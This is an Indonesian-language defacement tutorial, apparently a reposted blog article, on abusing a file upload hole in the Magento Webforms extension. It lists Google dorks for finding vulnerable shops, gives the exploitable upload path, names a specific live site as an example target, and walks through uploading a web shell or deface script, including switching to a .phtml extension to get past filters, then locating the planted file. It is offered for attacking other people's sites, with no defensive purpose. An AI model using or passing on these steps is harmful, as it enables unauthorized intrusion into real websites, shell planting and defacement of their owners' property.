Assalamualaikum Brother
Kali ini gua mau Repost Artikel gua Teknik Deface Menggunakan Magento Webforms File Upload Vulnerabilty
Google Dork :
inurl:/webforms/index/index
intext:2016 - inurl:/webforms/index/index/
intext:beauty intitle:shop dll
(kembangkan)
atau kalian bisa pakai Dork Magento Add Admin
Dork Magento Lengkap
CSRF:
kalian bisa pakai CSRF Online
Kalau pake CSRF Online POST File dengan : files[]
Exploit :
www.site.com/path//js/webforms/upload/index.php
Vulnerabilty : []
Contoh site vuln :
https://shop.destrooper.com/js/webforms/upload/index.php
Step By Step :
1. Masukan Target , dan PostFile. kalau sudah klik Kunci Target
2. Upload File kamu. Bisa di upload shell tapi kalau error coba ganti ext jadi .phtml kalau masih error upload aja script deface mu kalau sudah , klik Upload
3. Nanti akan muncul angka random
4. Tetak Shell atau File kita
www.site.com/[path]/js/webforms/upload/files/[angka random]/file kita.txt etc
Sekian dari saya semoga bermanfaat dan jangan lupa share... Terimkasih